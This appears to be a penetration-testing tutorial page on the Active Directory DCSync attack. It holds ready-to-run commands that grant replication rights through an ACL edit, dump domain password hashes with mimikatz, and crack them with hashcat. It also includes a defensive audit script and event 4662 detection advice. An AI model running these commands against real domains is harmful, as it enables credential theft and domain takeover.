DCSync

In Active Directory environments, Domain Controllers (DCs) replicate directory data with each other over the Directory Replication Service Remote Protocol (MS-DRSR). DCSync abuses this: the attacker impersonates a DC and asks a real DC for the credential attributes of chosen accounts (NT hashes, Kerberos keys, password history), effectively pulling ntds.dit contents over the network without ever executing code on a DC. The DC authenticates the caller as usual but never verifies that the caller is actually a DC; the only check is whether the caller's SID holds the replication extended rights on the domain's naming context.

To perform DCSync, an attacker must control an account that holds the following extended rights on the domain object: DS-Replication-Get-Changes (shown in most tools as Replicating Directory Changes), DS-Replication-Get-Changes-All (Replicating Directory Changes All) and, only when attributes in the RODC filtered set are wanted, DS-Replication-Get-Changes-In-Filtered-Set. The first two are enough to pull password hashes. By default they are held by the built-in Administrators group (and so by Domain Admins and Enterprise Admins through membership) and by the Domain Controllers themselves.

However, anyone with WriteDACL (or GenericAll) over the domain object can grant these rights to themselves. Notably, the Exchange Windows Permissions group often holds WriteDACL on the domain object in enterprise environments, which puts every member one ACL edit away from DCSync. For an example of leveraging WriteDACL to perform DCSync, see Forest.

Tools

We can enumerate who holds these rights from any domain-joined CMD or PS session; reading the domain object's ACL does not require elevation. Both commands query the ACL of the domain naming context (the domain object itself), because that is where the replication rights live, not on individual user objects.

# Command Prompt (look for "Replicating Directory Changes" entries in the output)
dsacls "DC=domain,DC=local"
# PowerShell (PowerView loaded; -ResolveGUIDs turns the rightsGuid into a readable name)
Get-DomainObjectAcl -Identity "DC=domain,DC=local" -Domain domain.local -ResolveGUIDs | Where-Object { $_.ObjectAceType -match 'DS-Replication-Get-Changes' -or $_.ActiveDirectoryRights -match 'GenericAll|WriteDacl' } | Select-Object SecurityIdentifier, ActiveDirectoryRights, ObjectAceType
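The same enumeration done without PowerView, as an added example that is not part of the original page: the script below reads the ACL of the domain naming context through the ActiveDirectory module's AD: drive, maps each Allow ACE to the replication right it grants (or to GenericAll / WriteDacl, which lead to DCSync in one step), and marks holders that are not among the stock defaults. The domain DN, the function name Get-DcSyncHolder and the default-holder SID list are assumptions of this example.

```powershell
# Added example (not from the original page): list every principal that can
# DCSync the domain by reading the ACL of the domain naming context.
# Assumes the ActiveDirectory RSAT module (for the AD: drive) and a domain
# account that can read the domain object's security descriptor, which any
# authenticated user normally can. $DomainDN is a placeholder for your domain.
Import-Module ActiveDirectory

$DomainDN = 'DC=domain,DC=local'   # assumption: replace with the target domain DN

# rightsGuid values of the three replication extended rights (AD schema constants)
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$AllExtendedRights = '00000000-0000-0000-0000-000000000000'  # empty ObjectType = every extended right

# Principals that hold replication rights in a stock domain, by well-known SID or RID suffix
$DefaultSids = @('S-1-5-32-544', 'S-1-5-9', 'S-1-5-18')  # Administrators, Enterprise DCs, SYSTEM
$DefaultRids = @('-516', '-519', '-498')                  # Domain Controllers, Enterprise Admins, Enterprise RODCs

function Get-DcSyncHolder {
    param([string]$Dn = $DomainDN)
    $rightsEnum = [System.DirectoryServices.ActiveDirectoryRights]
    $acl = Get-Acl -Path "AD:$Dn"

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $guid = $ace.ObjectType.ToString().ToLower()
        $why = $null

        if ($ace.ActiveDirectoryRights.HasFlag($rightsEnum::ExtendedRight)) {
            if ($ReplicationRights.ContainsKey($guid)) { $why = $ReplicationRights[$guid] }
            elseif ($guid -eq $AllExtendedRights)      { $why = 'All extended rights' }
        }
        # Not DCSync rights themselves, but each is one step away from them on the domain object
        if (-not $why -and $ace.ActiveDirectoryRights.HasFlag($rightsEnum::GenericAll)) { $why = 'GenericAll' }
        if (-not $why -and $ace.ActiveDirectoryRights.HasFlag($rightsEnum::WriteDacl))  { $why = 'WriteDacl' }
        if (-not $why) { continue }

        # Match defaults by SID rather than display name so renamed groups are still recognised
        try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { $sid = $ace.IdentityReference.Value }
        $isDefault = ($DefaultSids -contains $sid) -or
                     [bool]($DefaultRids | Where-Object { $sid.EndsWith($_) })

        [pscustomobject]@{
            Principal = $ace.IdentityReference.Value
            SID       = $sid
            Grants    = $why
            Default   = $isDefault
        }
    }
}

# Non-default holders come first: those are the ACEs an attacker added or an admin forgot
Get-DcSyncHolder | Sort-Object Default, Principal | Format-Table -AutoSize
```

Anything reported with Default = False deserves a look: a user or service account with DS-Replication-Get-Changes-All, or a group like Exchange Windows Permissions with WriteDacl, is exactly what the rest of this page shows an attacker creating or exploiting.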

We can assign DCSync rights either manually with the ActiveDirectory module or with PowerView's Add-DomainObjectAcl (DCSync.py is another option). Whichever tool is used, the account doing the assigning needs WriteDACL (or GenericAll) on the domain object.

The manual way is explained here.

# Manually (ActiveDirectory module; grants the rights to the account running the script)
Import-Module ActiveDirectory
$acl = Get-Acl "ad:DC=domain,DC=local"
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
$sid = New-Object System.Security.Principal.SecurityIdentifier $user.SID
$identity = [System.Security.Principal.IdentityReference] $sid
$adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
$type = [System.Security.AccessControl.AccessControlType] "Allow"
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
# rightsGuid for the extended right DS-Replication-Get-Changes-All
$objectGuid = New-Object Guid "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
# rightsGuid for the extended right DS-Replication-Get-Changes
$objectGuid = New-Object Guid "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
# Optional: DS-Replication-Get-Changes-In-Filtered-Set, only needed for attributes in the RODC filtered set
# $objectGuid = New-Object Guid "89e95b76-444d-4c62-991a-0facbeda640c"
# $acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType))
# Write the modified ACL back to the domain object (fails unless the caller has WriteDACL on it)
Set-Acl -AclObject $acl "ad:DC=domain,DC=local"

# PowerView (-PrincipalIdentity can be a user or a group; adds both replication ACEs in one call)
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity <USER> -Rights DCSync

Once the rights have been assigned, we can perform the attack with mimikatz. Each request is logged on the DC as Security event 4662 (when Directory Service Access auditing is enabled) with the replication rightsGuids in its Properties field, so detections commonly alert on 4662 carrying those GUIDs from any account that is not a DC computer account.

# Mimikatz (PS script)
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\administrator"'
# Mimikatz (binary), a single account
mimikatz # lsadump::dcsync /domain:DOMAIN.LOCAL /user:administrator
# Mimikatz (binary), every account in the domain as one line per user with RID, name and NT hash
mimikatz # lsadump::dcsync /domain:DOMAIN.LOCAL /all /csv

Finally, we can crack the NT hashes with hashcat on our attacking machine (mode 1000 is NTLM). Cracking is optional: the NT hash on its own is already enough for pass-the-hash or overpass-the-hash, and the krbtgt hash is what a golden ticket needs. The --force flag seen in many write-ups only suppresses driver warnings and is not needed on a working install.

hashcat -m 1000 hashes.dcsync rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule

Resources

  • An in-depth article about DCSync from Altered Security (article)

  • What impacket-secretsdump does behind the scenes (video)
